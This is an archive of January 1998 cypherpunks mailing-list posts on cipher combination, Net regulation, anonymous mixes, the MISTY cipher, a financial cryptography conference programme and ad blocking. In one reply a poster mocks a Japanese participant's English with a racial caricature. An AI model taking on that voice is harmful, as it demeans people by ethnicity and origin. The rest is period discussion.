There's the GNU ADA model - form a corporation to develop free software, and
	sell support contracts.

If you are interested in hack value and benefits to humanity, you are
probably best off avoiding the proprietary and shareware software models
(the two which will generally get you the most money, incidentally). But
this does not mean that you cannot write commercial software that is free;
see <http://www.gnu.org/philosophy/categories.html>.

It is worth noting that freeware does not necessarily have to be free of
charge; the important thing is that it be _freed_ software, or "libre"
software -- as opposed to "gratis" software.


> ...and then there's the Microsoft model - give away 'free' software and
>    charge for the OS to run it...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Fri, 23 Jan 1998 01:34:12 +0800
To: cypherpunks@toad.com
Subject: Cybersitter censors code
Message-ID: <3.0.5.32.19980122092119.007e9310@206.40.207.40>
MIME-Version: 1.0
Content-Type: text/plain



>--------------- Forwarded Message --------------
>From: rpj@ise.canberra.edu.au (Ross Johnson)
>
>Well, I just spent several hours tracking something down that I think
>is SO braindead that it must be called evil. I hope this will save
>someone else some hassle.
>
>There's an NT box on my desk that someone else uses every now and then.
>This machine is otherwise used as my programming box and backup server.
>
>All of a sudden, my programming files were being corrupted in odd
>places. I thought "hmm, my copy must be corrupt". So I refreshed the
>files. No change. "hmm, the code depot copy must be corrupt".. Checked
>from other machines. No problem there. Viewed the file from a web based
>change browser in Internet Explorer. Same corruption in the file.
>Telnet'd to the server machine and just cat'd the file to the terminal.
>Same problem.
>
>What's going on?
>
>The lines that were corrupted were of the form
>#define one 1 /* foo menu */
>#define two 2 /* bar baz */
>
>What I always saw ON THIS MACHINE ONLY was:
>#define one 1 /* foo     */
>#  fine two 2 /* bar baz */
>
>Can you guess what was happening?
>
>Turns out, someone had inadvertly installed this piece of garbage
>called CyberSitter, which purports to protect you from nasty internet
>content. Turns out that it does this by patching the TCP drivers and
>watching the data flow over EVERY TCP STREAM. Can you spot the offense
>word in my example? It's "NUDE". Seems that cybersitter doesn't care if
>there are other characters in between. So it blanks out "nu */ #de"
>without blanking out the punctuation and line breaks. Very strange and
>stupid.
>
>It also didn't like the method name "RefreshItems" in another file,
>since there is obviously a swear word embedded in there. Sheesh.
>
>It's so bad it's almost funny. Hope this brightens your day as much as
>it brighted mine :-).

------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

""The tragedy of Galois is that he could have contributed so much
more to mathematics if he'd only spent more time on his marksmanship."



	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Kelsey" <kelsey@plnet.net>
Date: Thu, 22 Jan 1998 23:36:48 +0800
To: "cypherpunks" <cypherpunks@Algebra.COM>
Subject: Re: (eternity) Eternity as a secure filesystem/backup medium
Message-ID: <199801221532.JAA28790@email.plnet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

[ To: cypherpunks ## Date: 01/21/98 ##
  Subject: Re: (eternity) Eternity as a secure filesystem/backup
medium ]

>Subject:      Re: (eternity) Eternity as a secure filesystem/backup
medium
>From:         Adam Back <aba@dcs.ex.ac.uk>
>Date:         1998/01/18

>1. communications crypto used by the author in submitting
>   the document is broken

This is only a threat if the authorities have a good idea
who submitted the data, and want to prove it.  Otherwise,
you end up with billions of encrypted documents, each
encrypted with a moderately weak cipher.  (Even assuming
that the cipher turns out to have only 40 bits of strength,
this is too expensive to do for more than a handful of
documents.)

>2. the eternity architecture contains encrypted documents to
>   frustrate attempts to locate documents, and to hide the
>   contents of documents from individual servers

Again, this won't be too economical unless the eternity
service is rarely used.

>3. communications crypto used to request and deliver
>   documents is broken thus revealing the readers identity


>So it is useful to design upgrade paths for ciphers into the
>protocols where possible.

Definitely--this is always a good idea, right?

>Other approaches we could take are to use very conservative
>cipher key sizes and protocols combining multiple ciphers in
>ways which gives us the security of the best of the ciphers.

>For example:

>	R = random, C = 5DES( R ) || blowfish-484( M xor R )

>Where 5DES is say E-D-E-D-E with 5 independent DES keys.

>Constructs to combine in strong ways hash functions, macs,
>symmetric and asymmetric ciphers would be useful.  Is there
>much research in this area?

Yes.  Massey and Maurer did a Journal of Cryptography paper
titled ``The Importance of Being First,'' which says that
in any chain of encryptions with different ciphers and
independent keys, such as E_1(E_2(E_3(data))), the whole
thing is provably as strong as the first cipher used on the
data (E_3, in my example above).  This is really obvious,
when you reflect that an attacker can always try to break
data encrypted with E_3 by superencrypting it with E_1 and
E_2, and then mounting his attack on E_1(E_2(E_3(data))).
Of course, if keys aren't independent among the three
ciphers, then you don't get any guarantee of this kind.

The other thing to note is that if you're just generating
keystream sequences, as you would with RC4 or SEAL, then all
ciphers are ``first.''

Rivest and Sherman also did some work on randomized
encryption, of the kind you discuss, in the Crypto '82
proceedings.  Your construction is very similar to one of
theirs.  Let M = message and R = a message-sized random
number, then in

E_1(R), E_2(R XOR M)

both E_1 and E_2 must be broken to learn M.  (Imagine this
isn't the case, then either E_1 or E_2 wasn't broken.  If
you didn't break E_2 but broke E_1, then you only learn R,
which is useless to you--it's random and uncorrelated with
M.  If you broke E_2 but not E_1, you would have a message
encrypted with a one-time pad.)

This generalizes nicely to

E_1(R1), E_2(R2), ..., E_N(RN), E_{N+1}(R1 XOR R2 XOR ... XOR M).

If those random numbers are really random, then if any one
of those ciphers resists your attacks, the message can't be
recovered.

Now, you can also do this with things that approximate
random functions, which they also discuss.  Thus, you might
use:

f_1(),f_2(), ..., f_n() are N independently-keyed different
cryptographic functions that approximate random functions.

The funny thing is, if you instantiate this intelligently,
you get a message encrypted by N different stream ciphers,
perhaps with a random parameter per message thrown in during
keying of those ciphers.  Thus, suppose

s_1(K1) = RC4(K1)
s_2(K2) = 3DES-OFB(K2)
s_3(K3) = SHA1-Counter-Mode(K3)
s_4(K4) = Blowfish-OFB(K4)
s_5(K5) = SAFER-SK128(K5).

and that these keys are different per message and are all
independent.  Then, you get the result that

M XOR s_1(K1) XOR S_2(k2) XOR ... XOR s_5(k5).

leaves no way to recover M unless all five s_i() can be
guessed.

Note that, in practice, this isn't likely to be useful
unless you've done the same kind of thing for symmetric key
distribution, random number generation, etc.  Otherwise,
your attacker in 2050 will bypass the symmetric encryption
entirely and factor your RSA modulus, or guess all the
entropy sources used for your PRNG, or whatever else you can
think of.

The good news, though, is that active attacks (like chosen
input attacks) and many side-channel attacks (e.g., timing
attacks) turn out not to be possible if you are trying to
mount them after the encryption has been carried out.

>Adam

- --John Kelsey, kelsey@counterpane.com / kelsey@plnet.net
NEW PGP print =  5D91 6F57 2646 83F9 6D7F 9C87 886D 88AF

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNMeCqSZv+/Ry/LrBAQGxpgQAloxNjdZMf6l/7U520ZSIVuk7lFZcu0+J
5tUyQgHtS4EAplC1OBnYc8B3pzCir6VCXinmNbClgalXhrRFfmV7vTQLZySaVv/+
0T44TFkJ0Ldu4cTsA2ertL0jcCXiBp38mhVK2IFbPtN+04B+een8jrUYtzx/qIj5
ztBpBb4yil8=
=wBTR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Fri, 23 Jan 1998 03:55:48 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Gore Commission wants to regulate the Net like broadcast
In-Reply-To: <Pine.LNX.3.95.980120163439.4246A-100000@vorlon.mit.edu>
Message-ID: <3.0.5.32.19980122093613.00842e90@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:30 PM 1/21/98 -0800, Tim May wrote:
>The Internet is about pure speech, about publishing.  For the Gore
>Commission to even _hint_ at regulating it is reprehensible.

You know better than that, Tim - The Internet is about Commerce!
The military started it, federal funding for universities made
it popular, Physicists working for Foreign Governments and
grad students at US government universities made the Web,
and Big Commerce made it grow.  It's all Federal Interest - trust them!

And besides, IPv4 addresses _are_ a scarce resource that needs
to be allocated for the public good, and IPv6 has to be stopped
because it will devalue the addresses given to IPv4 users
(which would be an unconstitutional "taking" of their entitlements)
not to mention because it supports technology that could support
narcoterrorist agents of foreign governments and money-laundering
father-raping pornographers.


>Video rental stores can also >deliver video signals, but there is no 
>(well, modulo the "obscenity" laws in various communities) 
>regulation of these sources.

There's also regulation against revealing the rental records of
individual customers (at least customers named Bork or Thomas),
except to accommodate the legitimate needs of law endorsement or
advertising.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Fri, 23 Jan 1998 04:03:48 +0800
To: cypherpunks@toad.com
Subject: Re: Revenge on the Nerds  -Maureen on a rampage
In-Reply-To: <19980121.080832.attila@hun.org>
Message-ID: <3.0.5.32.19980122094933.00844100@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>Jack Aaron's, the commodities division of Goldman Sachs, controls inter alia
>like 99% of US coffee supply.  if you try to circumvent their monopoly,
>by trying to import a material amount of coffee, whether it's the cheap shit
>for proles or the high-end caffeine fix from Kenya, you and your suppliers
>just might find yourself in a lot more trouble that the computer manusfacturers
>who were reluctant to put the free mickeysoft browser on their dekstop.
>Why doesn't DOJ come down on Goldman Sachs?  Does it have anything to do with
>the fact that a Goldman Sachs partner is in Clinton's cabinet?

Yow - talk about threats to the Computer Industry - Controlling our
Coffee Supply can affect the productivity of the Entire Country!
These Monopolists are  after our precious bodily fluids!

BTW, if you've ever been to Sacramento, CA, that hive of villiany
and stupidity, there's apparently a law or custom which says that
nobody may make or sell any coffee strong enough to wake up a
government bureaucrat...

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Stutz <stutz@dsl.org>
Date: Thu, 22 Jan 1998 23:13:38 +0800
To: "Igor Chudov @ home" <ichudov@Algebra.COM>
Subject: Re: Revenge on the Nerds  -Maureen on a rampage
In-Reply-To: <199801220537.XAA00871@manifold.algebra.com>
Message-ID: <Pine.LNX.3.95.980122095223.10685N-100000@nacs.net>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 21 Jan 1998, Igor Chudov @ home wrote:

> Dr.Dimitri Vulis KOTM wrote:
> > Speaking of browsers: I'd rather *pay* for a browser that has such an obvious
> > feature as a list of URL regexps that you don't want to browse.
<snip>

> I suggest writing a proxy server that does such filtering, running it on 
> the local machine, and using it as proxy server from your netscape browser.
> 
> There is a proxy server in form of a 20 line perl script, you
> can take it and modify it.

Try this:

/sbin/route add -net 199.95.207.0 netmask 255.255.255.0 lo
/sbin/route add -net 199.95.208.0 netmask 255.255.255.0 lo

Goodbye doubleclick.net. ... Repeat as necessary with other ad networks.

I wrote an init.d script for Debian GNU/Linux that automagically handles
this for a couple ad networks, if you're intersted.



Michael Stutz  .  http://dsl.org/m/  .  copyright disclaimer etc
stutz@dsl.org  :  finger for pgp     :  http://dsl.org/copyleft/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Fri, 23 Jan 1998 03:55:49 +0800
To: "'Cypherpunks'" <cypherpunks@Algebra.COM>
Subject: Re: On the LAM--Local Area Mixes
In-Reply-To: <01BD260F.23755960@d850.pppdel.vsnl.net.in>
Message-ID: <3.0.5.32.19980122103026.00844e80@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Wiring houses/business/etc. together simply for the purpose of mixes
is difficult enough that it won't happen enough to be significant.
On the other hand, cable modems keep claiming that they'll be widely
deployed Real Soon Now, and at least some of the cable modem versions
seem to support communications between users on the same cable or
same chunk of the cable network, and may provide a useful medium,
especially if broadcasts/multicasts are available.  On a smaller scale,
there are increasing numbers of office buildings that come with
internet access, and the occasional Palo Alto apartment building is
cooperatively wired.

At 01:48 AM 1/21/98 +-5-30, Rishab Aiyer Ghosh wrote:
>besides, if such technology becomes widespread in, say, the US,
>then it's inevitable that the authorities will tend towards more 
>_real_ tyrannical behaviour, diluting search/seizure protections and 
>taking you closer to china. a weak vaccine
> _strengthens_ the microbe it is supposed to kill. 

We've certainly seen that in the Drug Wars, with no-knock searches
and similar attacks.  On the other hand, use of search warrants in the US
has always been honored more in the breach than the observance -
the year before the Supreme Court issued the Exclusionary Rule,
the New York City police didn't bother getting any search warrants,
because the Constitutional requirement that they do so didn't have
any real enforcement mechanism.

However, LAMs and similar technology have the value that the police
may not notice all the users in a cluster, especially passive lurkers,
and the disappearance of multiple nodes allows the non-seized systems
to get their data out to another data haven and clean up. 
Lurkers may be passive on the LAM, but forward data received from it
out to other media.  Running network protocols without ACKs takes
a bit of work to get right, but you can run the ACKs in some outside
channel to make sure you get everything; much of the work on
multicast protocols can be used to implement it.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 22 Jan 1998 23:53:32 +0800
To: whgiii@invweb.net
Subject: Re: Misty???
In-Reply-To: <199801220634.BAA28888@users.invweb.net>
Message-ID: <199801221545.KAA09941@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



Carlisle Adams included it in his list of interesting cipherss in his
talk at RSA.

Lars Knudsen's Block Cipher Lounge does not list any known attacks.
http://www.esat.kuleuven.ac.be/~knudsen/bc

Matsui, its designer, is not stupid.  He did the linear cryptanalysis
of DES, which I think was the invention of linear cryptanalysis.

Adam


William H. Geiger III wrote:

| Well on another mailing list I have been chastised for calling Misty
| "snake-oil".
| 
| Has anyone actually examined this algorithm? Seems there is an IETF Draft
| on it (draft-ohta-misty1desc-00.txt).
| 
| Any opinions on it?? My only exposure has be through the pidgon-english
| posts of Nobuki Nakatuji (if it looks like a duck, it smells like a duck,
| it quacks like a duck ....).


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 23 Jan 1998 00:00:57 +0800
To: tcmay@got.net
Subject: Re: Misty???
In-Reply-To: <v03102801b0ec9df81dd5@[207.167.93.63]>
Message-ID: <199801221554.KAA09992@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:
| At 9:08 PM -0800 1/21/98, William H. Geiger III wrote:

| >Any opinions on it?? My only exposure has be through the pidgon-english
| >posts of Nobuki Nakatuji (if it looks like a duck, it smells like a duck,
| >it quacks like a duck ....).
| 
| I wouldn't call Misty "snake oil." But it's also been thoroughly taken
| apart and shown to be weak. Importantly, it was submitted by Mitsubishi for
| peer review.

Could you provide a pointer to the analysis paper?

Adam

ObCypherpunk: I think that 9mm is far superior to .45 due to its lower
recoil.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul Bradley" <csm70830@port.ac.uk>
Date: Thu, 22 Jan 1998 19:12:58 +0800
To: "Nobuki Nakatuji" <bd1011@hotmail.com>
Subject: Re: Ultra computer
In-Reply-To: <19980122011204.22624.qmail@hotmail.com>
Message-ID: <4A2EFF7EEF@ou20.csm.port.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain




> Ultra computer which NEC had the calculation speed of the world
> maximum of about 1000 times of the super computer to was decided
> to be developed. 

Ultra sushi maximum of 10000000000 earth fishes chop-chopped. Me go 
sushi bar, too much Sake me say.

 
--                  
                            Paul Bradley 
                      paul@fatmans.demon.co.uk
       "Why should anyone want to live on rails?" - Stephen Fry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Fri, 23 Jan 1998 03:32:50 +0800
To: Bill Frantz <cypherpunks@cyberpass.net
Subject: Re: Gore Commission wants to regulate the Net like broadcast
In-Reply-To: <v03102800b0ec097cf8e5@[207.167.93.63]>
Message-ID: <v04003a01b0ed4ca0841e@[130.248.15.47]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:36 PM -0800 1/21/98, Bill Frantz wrote:
>At 12:30 PM -0800 1/21/98, Tim May wrote:
>>At 1:34 PM -0800 1/20/98, Declan McCullagh wrote:
>>>Date: Tue, 20 Jan 1998 16:20:23 -0500
>>>From: Alan Moseley <amoseley@clark.net>
>>>To: declan@well.com
>>>Subject: the Gore Commission and digital media
>>>
>>>The Gore Commission -- the group created by Clinton to determine the
>>>future public interest obligations of digital TV broadcasters -- showed
>>>signs last week of broadening its reach to include other digital media
>>>that can deliver broadcast-like audio and video.
>>>...
>>>	The recent experience of the Communications Decency Act
>>>demonstrates the government's willingness to control digital speech.  The
>                                //eagerness
>>>digital convergence argument could be a  new rationale for further such
>>>interventions, Maines warned.
>>
>>Just because the Internet can deliver audio and video signals is hardly a
>>matter of "allocating scarce resources." Video rental stores can also
>>deliver video signals, but there is no (well, modulo the "obscenity" laws
>>in various communities) regulation of these sources.
>
>Presumably they intend to also regulate live theater.  It can also deliver
>audio and video.  FUBAR.
>
Nope.
Just places that rent or sell DVDs and CDs.
"Other Digital Media".

FUBAR, indeed.

-- Marshall

Marshall Clow     Adobe Systems   <mailto:mclow@mailhost2.csusm.edu>

Warning: Objects in calendar are closer than they appear.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 23 Jan 1998 01:26:26 +0800
To: cypherpunks@cyberpass.net
Subject: Financial Cryptography '98 Preliminary Program
Message-ID: <v04003904b0ed2d88acaf@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Tue, 20 Jan 1998 23:41:27 -0400
X-Authentication-Warning: online.offshore.com.ai: list set sender to
fc98-request@offshore.com.ai using -f
Date: Wed, 21 Jan 1998 04:25:40 +0100 (MET)
From: Ray Hirschfeld <R.Hirschfeld@cwi.nl>
To: R.Hirschfeld@cwi.nl
Subject: Financial Cryptography '98 Preliminary Program
Resent-From: fc98@offshore.com.ai
X-Mailing-List: <fc98@offshore.com.ai> archive/latest
X-Loop: fc98@offshore.com.ai
Precedence: list
Resent-Sender: fc98-request@offshore.com.ai

                      Financial Cryptography '98
                   Second International Conference
                 February 23-25, 1998, Anguilla, BWI
                          CONFERENCE PROGRAM


General Information:

Financial Cryptography '98 (FC98) is a conference on the security of
digital financial transactions.  Meetings alternate between the island
of Anguilla in the British West Indies and other locations.  This
second meeting will be held in Anguilla on February 23-25, 1998.  FC98
aims to bring together persons involved in both the financial and data
security fields to foster cooperation and exchange of ideas.

Original papers were solicited on all aspects of financial data
security and digital commerce in general.


Program Committee:

Matt Blaze, AT&T Laboratories--Research, Florham Park, NJ, USA
Antoon Bosselaers, Katholieke Universiteit Leuven, Leuven, Belgium
Yves Carlier, Bank for International Settlements, Basel, Switzerland
Walter Effross, Washington College of Law, American U., Washington DC, USA
Matthew Franklin (Co-Chair), AT&T Laboratories--Research, Florham Park, NJ, USA
Michael Froomkin, U. Miami School of Law, Coral Gables, FL, USA
Rafael Hirschfeld (Chair), Unipay Technologies, Amsterdam, The Netherlands
Alain Mayer, Bell Laboratories/Lucent Technologies, Murray Hill, NJ, USA
Moni Naor, Weizmann Institute of Science, Rehovot, Israel
Frank Trotter, Mark Twain Ecash/Mercantile Bank, St. Louis, MO, USA
Doug Tygar, Carnegie Mellon University, Pittsburgh, PA, USA
Moti Yung, CertCo LLC (formerly: Bankers Trust E-Commerce), New York, NY, USA


Conference Program for FC98:

Monday 23 February 1998

 800 --  820
    Breakfast

 820 --  830
    Welcome

 830 --  905
    Micropayments via Efficient Coin-Flipping
    Richard J. Lipton (Princeton University, Princeton, NJ, USA)
    Rafail Ostrovsky (Bellcore, Morristown, NJ, USA)

 905 --  940
    X-Cash: Executable Digital Cash
    Markus Jakobsson (Bell Laboratories, Murray Hill, NJ, USA)
    Ari Juels (RSA Laboratories, Bedford, MA, USA)

 940 -- 1015
    Billing Without Paper...Or Billing Without Billers?
      Caveat Biller: 3rd Party Concentrators Could Come Between You
      and Your Customers
    Richard K. Crone (CyberCash, Reston, VA, USA)

1015 -- 1045
    Coffee Break

1045 -- 1120
    A Platform for Privately Defined Currencies, Loyalty Credits,
      and Play Money
    David P. Maher (AT&T Labs--Research, Florham Park, NJ, USA)

1120 -- 1155
    Assessment of Threats for Smart Card Based Electronic Cash
    Kazuo J. Ezawa, Gregory Napiorkowski
        (Mondex International, Florham Park, NJ, USA)

1155 -- 1230
    Using a High-Performance, Programmable Secure Coprocessor
    Sean W. Smith, Elaine R. Palmer, Steve Weingart
        (IBM T.J. Watson Research Center, Yorktown Heights, NY, USA)

1230 -- 1330
    Lunch

1800 -- 1930
    Cocktail Reception (at Mariners Hotel)


Tuesday 24 February 1998

 800 --  830
    Breakfast

 830 --  905
    Secure Group Barter:
      Multi-Party Fair Exchange with Semi-Trusted Neutral Parties
    Matt Franklin (AT&T Labs--Research, Florham Park, NJ, USA)
    Gene Tsudik (USC Information Sciences Institute, Marina del Rey, CA, USA)

 905 --  940
    A Payment Scheme Using Vouchers
    Ernest Foo, Colin Boyd
        (Queensland University of Technology, Brisbane, Australia)

 940 -- 1015
    A Formal Specification of Requirements for Payment Transactions
      in the SET Protocol
    Catherine Meadows, Paul Syverson
        (Naval Research Laboratory, Washington, DC, USA)

1015 -- 1045
    Coffee Break

1045 -- 1120
    On Assurance Structures for WWW Commerce
    Markus Jakobsson (Bell Laboratories, Murray Hill, NJ, USA)
    Moti Yung (CertCo, New York, NY, USA)

1120 -- 1230
    Panel Discussion
    Certificate Revocation: Mechanics and Meaning
    Barb Fox (Microsoft, Redmond, WA, USA), moderator
    Joan Feigenbaum (AT&T Labs--Research, Florham Park, NJ, USA)
    Paul Kocher (Valicert, Palo Alto, CA, USA)
    Michael Myers (Verisign, Mountain View, CA, USA)
    Ron Rivest (MIT Laboratory for Computer Science, Cambridge, MA, USA)

1230 -- 1330
    Lunch

2000 -- 2200
    Rump Session


Wednesday 25 February 1998

 800 --  830
    Breakfast

 830 --  930
    Invited Speaker
    Private Signatures and E-commerce
    David Chaum (DigiCash, Palo Alto, CA, USA)

 930 -- 1005
    Group Blind Digital Signatures:
      A Scalable Solution to Electronic Cash
    Anna Lysyanskaya, Zulfikar Ramzan
        (MIT Laboratory for Computer Science, Cambridge, MA, USA)

1005 -- 1045
    Coffee Break

1045 -- 1120
    Curbing Junk E-Mail via Secure Classification
    Eran Gabber, Markus Jakobsson, Yossi Matias, Alain Mayer
        (Bell Laboratories, Murray Hill, NJ, USA)

1120 -- 1155
    Publicly Verifiable Lotteries:
      Applications of Delaying Functions
    David M. Goldschlag (Divx, Herndon, VA, USA)
    Stuart G. Stubblebine (AT&T Labs--Research, Florham Park, NJ, USA)

1155 -- 1230
    Security of Digital Watermarks
    Lesley R. Matheson, Stephen G. Mitchell, Talal G. Shamoon,
      Robert E. Tarjan, Francis X. Zane
        (STAR Lab, InterTrust Technologies, Sunnyvale, CA, USA)

1230 -- 1330
    Lunch

1330 -- 1405
    Security in the Java Electronic Commerce Framework
    Surya Koneru, Ted Goldstein
        (JavaSoft, Palo Alto, CA, USA)

1405 -- 1440
    Beyond Identity: Warranty-Based Digital Signature Transactions
    Yair Frankel, David W. Kravitz, Charles T. Montgomery, Moti Yung
        (CertCo, New York, NY, USA)

1440 -- 1515
    Compliance Checking in the PolicyMaker Trust Management System
    Matt Blaze, Joan Feigenbaum, Martin Strauss
        (AT&T Labs--Research, Florham Park, NJ, USA)

1515 -- 1545
    Coffee Break

1545 -- 1620
    An Efficient Fair Off-Line Electronic Cash System
      with Extensions to Checks and Wallets with Observers
    Aymeric de Solages, Jacque Traore
        (France Telecom--CNET, Caen, France)

1620 -- 1655
    An Efficient Untraceable Electronic Money System Based on
      Partially Blind Signatures of the Discrete Logarithm Problem
    Shingo Mayazaki, Kouichi Sakurai
        (Kyushu University, Fukuoka, Japan)

1655 -- 1700
    Closing


The conference schedule and additional information is available at the
URL http://www.cwi.nl/conferences/FC98/.

Breakfast and lunch are provided at the conference.  The conference
organizers have left time open for corporate sponsored events, for
networking, and for recreational activities on the resort island of
Anguilla.  Participants are encouraged to bring their families.


Workshop:

A 40-hour workshop, intended for anyone with commercial software
development experience who wants hands-on familiarity with the issues
and technology of financial cryptography, is planned in conjunction
with FC98, to be held during the week following the conference.

For more information on the workshop, please see the URL
http://www.cs.berkeley.edu/~iang/fc98/workshop.html.

For workshop registration, see the URL http://fc98.ai/.


Special Attraction:

On Thursday, February 26, 1998, there will be a total eclipse of the
sun.  The narrow zone of 100% totality will pass just south of
Anguilla.  A boat excursion to the center of the eclipse zone is
planned, for an optimal view of the eclipse.  The excursion is
included in the conference registration; additional tickets can be
purchased for accompanying persons.


Venue:

The Inter-Island Hotel is a small 14-room guest house with a large,
comfortable 150-seat conference facility and additional space for a
small 10-booth exhibition.  The Inter-Island is on Road Bay, near
Sandy Ground Village, in the South Hill section of Anguilla.  The
conference, workshop, and exhibition will have TCP/IP internet access.
Shuttle service to the conference will be available.


Air Transportation and Hotels:

Air travel to Anguilla is typically done through San Juan for US
flights, or St. Maarten/Martin for flights from Europe and the US.
There are also connections via Antigua.

Anguillan import duties are not imposed on hardware or software which
will leave the island again. There are no other taxes--or cryptography
import/export restrictions--on Anguilla.

Hotels range from spartan to luxurious, and more information about
hotels on Anguilla can be obtained from your travel agent, or at the
URL http://fc98.ai/.  A block reservation has been made at Mariners,
and this is the recommended hotel except for those seeking budget
accomodations.


General Chairs:

Robert Hettinga, Shipwright, Boston, MA, USA
   email: rah@shipwright.com
Vincent Cate, Offshore Information Services, Anguilla, BWI
   email: vince@offshore.com.ai

Exhibits and Sponsorship Manager:

Blanc Weber, Seattle, WA, USA
   email: blancw@cnw.com

Workshop Leader:

Ian Goldberg, Berkeley, CA, USA
  email: iang@cs.berkeley.edu


Registration:

You can register and pay for conference admission via the World Wide
Web at the URL http://fc98.ai/.

The cost of the FC98 Conference is US$1,000.  There are reduced rates
of US$250 and US$100 for full-time academics and students.

Booths for the exhibition start at US$5,000 and include two conference
tickets. For more information about exhibit space, contact Blanc
Weber, blancw@cnw.com.  Sponsorship opportunities for FC98 are still
available.

The cost of the workshop is US$5000, and includes meals but not
lodging.  You can register for the workshop, which runs the week after
the conference, at the URL http://fc98.ai/.


Financial Cryptography '98 is held in cooperation with the
International Association for Cryptologic Research.

It is sponsored by:

RSA Data Security Inc. <http://www.rsa.com>
C2NET, Inc. <http://www.c2.net>
Hansa Bank & Trust Company Limited, Anguilla <http://www.hansa.net/>
Sicherheit und Privat- International Bank <mailto:spbank@schloss.li>
Offshore Information Services <http://www.offshore.com.ai/>
e$ <http://www.shipwright.com>

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 23 Jan 1998 05:07:14 +0800
To: cypherpunks@Algebra.COM
Subject: Why no "Banner Ad Eaters"?
In-Reply-To: <34c704c2.971366@128.2.84.191>
Message-ID: <v03102800b0ed615868a4@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:21 AM -0800 1/22/98, bill.stewart@pobox.com wrote:

>What I'd really like to see in a browser is an option to
>turn off animated GIFs (other than by killing all images.)
>

Yeah, I'm surprised that "banner ad eaters" have not been widely deployed.
(If they're available, I haven't about them.) Something to remove the
annoying banners, or stop them from wasting valuable time loading in the
first place.

These would be comparable to "television commercial killers," which have
not really been feasible, as the pattern recognition methods (like
increased volume for commercials) are not reliable.

But with banner ads, this should be possible. Whether through a plug-in, or
through a "patched" version of Navigator or Explorere. (In fact, why don't
these vendors offer a switch to turn off downloading of ads? I think I know
the marketing reason, but this still suggests a market opportunity for
someone to jump in with a patched version, or a "advertising-free" browser.)

BTW, some of the notorious features of the new "anti-hacking" laws make
disassembly of programs, like browsers, illegal. While they won't bother
with folks who just fool around with disassembling code, they might use
these anti-hacking laws to throw the book at anyone who made such a
banner-eater available.

After all, directly infringing on the rights of advertisers to beam their
shit into our eyeballs is America's most serious crime.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 23 Jan 1998 03:59:48 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: On the LAM--Local Area Mixes (fwd)
Message-ID: <199801221953.NAA09086@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 22 Jan 1998 10:30:26 -0800
> Original-From: Bill Stewart <bill.stewart@pobox.com>
> Subject: Re: On the LAM--Local Area Mixes

> the year before the Supreme Court issued the Exclusionary Rule,
> the New York City police didn't bother getting any search warrants,
> because the Constitutional requirement that they do so didn't have
> any real enforcement mechanism.

Are police considered an extension of the judicial or the executive arm of
the government?


    ____________________________________________________________________
   |                                                                    |
